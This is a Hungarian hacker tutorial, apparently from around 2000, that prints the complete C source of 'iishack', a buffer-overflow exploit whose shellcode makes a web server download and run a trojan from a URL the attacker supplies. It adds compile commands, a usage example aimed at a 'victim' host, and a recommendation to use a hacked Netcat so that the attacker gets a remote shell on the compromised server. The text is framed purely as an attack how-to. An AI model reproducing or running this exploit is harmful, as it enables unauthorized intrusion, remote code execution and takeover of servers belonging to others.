Bevezető
Biztos vagyok benne hogy már sokan találkoztatok olyan
oldallal, amin a fentebb említett webszerver pörgött ezerrel. Pontosabban nem is
webszerver, mert tudtommal van FTP és Gopher része is. Éppen a napokban találtam egy
windows alatt futtatható kicsi programot amivel egy exploitot kijátszva fel tudsz
tölteni egy trojai programot. Itt szeretném megemlíteni, hogy van ugyebár linuxos .c
forrása is, én ezt használom, úgyhogy a cikk főleg erre fog épülni.
A Linuxos C forrás
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdlib.h>
#include <arpa/inet.h>
#define egglen 1157
#define urloff 1055
unsigned char egg[] = {
71, 69, 84, 32, 47, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 176, 135, 103, 104, 176, 135, 103, 104, 144, 144, 144, 144, 88,
88, 144, 51, 192, 80, 91, 83, 89, 139, 222, 102, 184, 33, 2, 3, 216,
50, 192, 215, 44, 33, 136, 3, 75, 60, 222, 117, 244, 67, 67, 186, 208,
16, 103, 104, 82, 81, 83, 255, 18, 139, 240, 139, 249, 252, 89, 177, 6,
144, 90, 67, 50, 192, 215, 80, 88, 132, 192, 80, 88, 117, 244, 67, 82,
81, 83, 86, 178, 84, 255, 18, 171, 89, 90, 226, 230, 67, 50, 192, 215,
80, 88, 132, 192, 80, 88, 117, 244, 67, 82, 83, 255, 18, 139, 240, 90,
51, 201, 80, 88, 177, 5, 67, 50, 192, 215, 80, 88, 132, 192, 80, 88,
117, 244, 67, 82, 81, 83, 86, 178, 84, 255, 18, 171, 89, 90, 226, 230,
51, 192, 80, 64, 80, 64, 80, 255, 87, 244, 137, 71, 204, 51, 192, 80,
80, 176, 2, 102, 171, 88, 180, 80, 102, 171, 88, 171, 171, 171, 177, 33,
144, 102, 131, 195, 22, 139, 243, 67, 50, 192, 215, 58, 200, 117, 248, 50,
192, 136, 3, 86, 255, 87, 236, 144, 102, 131, 239, 16, 146, 139, 82, 12,
139, 18, 139, 18, 146, 139, 215, 137, 66, 4, 82, 106, 16, 82, 255, 119,
204, 255, 87, 248, 90, 102, 131, 238, 8, 86, 67, 139, 243, 252, 172, 132,
192, 117, 251, 65, 78, 199, 6, 141, 138, 141, 138, 129, 54, 128, 128, 128,
128, 51, 192, 80, 80, 106, 72, 83, 255, 119, 204, 255, 87, 240, 88, 91,
139, 208, 102, 184, 255, 15, 80, 82, 80, 82, 255, 87, 232, 139, 240, 88,
144, 144, 144, 144, 80, 83, 255, 87, 212, 139, 232, 51, 192, 90, 82, 80,
82, 86, 255, 119, 204, 255, 87, 236, 128, 252, 255, 116, 15, 80, 86, 85,
255, 87, 216, 128, 252, 255, 116, 4, 133, 192, 117, 223, 85, 255, 87, 220,
51, 192, 64, 80, 83, 255, 87, 228, 144, 144, 144, 144, 255, 108, 102, 115,
111, 102, 109, 84, 83, 33, 128, 141, 132, 147, 134, 130, 149, 33, 128, 141,
152, 147, 138, 149, 134, 33, 128, 141, 132, 141, 144, 148, 134, 33, 128, 141,
144, 145, 134, 143, 33, 120, 138, 143, 102, 153, 134, 132, 33, 104, 141, 144,
131, 130, 141, 98, 141, 141, 144, 132, 33, 120, 116, 112, 100, 108, 84, 83,
33, 147, 134, 132, 151, 33, 148, 134, 143, 133, 33, 148, 144, 132, 140, 134,
149, 33, 132, 144, 143, 143, 134, 132, 149, 33, 136, 134, 149, 137, 144, 148,
149, 131, 154, 143, 130, 142, 134, 33, 144, 152, 143, 79, 134, 153, 134, 33,
33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33,
33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33,
33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33,
33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33,
33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33,
33, 33, 33, 33, 33, 46, 104, 116, 114, 32, 72, 84, 84, 80, 47, 49,
46, 48, 13, 10, 13, 10, 10 };
u_int32_t resolve(char *host)
{
struct hostent *he;
long n = inet_addr(host);
if(n!=-1)
return(n);
he = gethostbyname(host);
if(!he)
{
herror("gethostbyname");
return(0);
}
memcpy(&n, he->h_addr, 4);
return(*(long *)he->h_addr_list[0]);
}
int main(int argc, char **argv)
{
char *server;
int port;
char *url;
int fd;
struct sockaddr_in s_in;
int i=0,x,j=0;
int first=0;
if(argc != 4)
{
fprintf(stderr, "usage: %s <server> <port> <trojan>\n",
argv[0]);
exit(1);
}
server = argv[1];
port = atoi(argv[2]);
url = argv[3];
if(strlen(url) > 85)
{
fprintf(stderr, "Trojan name must be less than 85 characters.\n");
exit(1);
}
for(x=0;x<strlen(url);x++)
{
if(url[x] == '/' && !first)
{
first=1;
egg[urloff+j]='!'+0x21;
egg[urloff+j+1]='G'+0x21;
egg[urloff+j+2]='E'+0x21;
egg[urloff+j+3]='T'+0x21;
egg[urloff+j+4]=' '+0x21;
egg[urloff+j+5]='/'+0x21;
j+=6;
continue;
}
egg[urloff+j] += url[x];
j++;
}
fd = socket(AF_INET, SOCK_STREAM, 0);
s_in.sin_family = AF_INET;
s_in.sin_port = htons(port);
s_in.sin_addr.s_addr = resolve(server);
connect(fd, (struct sockaddr *)&s_in, sizeof(struct sockaddr_in));
while(i!=egglen)
{
x=send(fd, egg+i, egglen-i, 0);
if(x<0)
{
fprintf(stderr, "Connection to target lost. WTF?\n");
exit(1);
}
i+=x;
}
printf("Trojan uploaded successfully (I think...)\n");
return(0);
}
/* EuroHack Team [2000] http://hackers.hungary.nu */
Használati útmutató
A programnak, mint ahogy azt már fentebb említettem, van
linuxos és windowsos változata is. A linuxos egy .c forrás, amit feljebb láthattatok,
a dosos pedig egy .asm forrás. A linuxost "cc -o iishack iishack.c"
parancsal fordíthatjátok le, a windowsost pedig a "tasm32 -ml iishack.asm
majd a tlink32 -Tpe -c -x iishack.obj ,,, import32" parancsok
segítségével. Ha ez megtörtént akkor az alábbi módon tudsz exploitokat feltölteni
a az áldozat gépére:
./iishack <server> <port> <trojai>
Például:
./iishack www.aldozathostja.hu 80
www.encimemaholatrojaivan.com/exploit.exe
Ajánlat
Az ajánlott trojai progi a művelet végrehajtásához az
NCX.EXE vagy az NCX99.EXE legyen. Ez a Netcat hackelt változata... Miután az iishack egy
verem túlcsordulás után feljuttatta és elindította, a progi az iishack-nél
beállított portot megnyitja és egy shellhez juttat a szerveren.
Ötlet:
http://ww.eEye.Com/
Letölthető források, programok:
- NCX.EXE
- NCX99.EXE
- IISHACK.C
- IISHACK.ASM |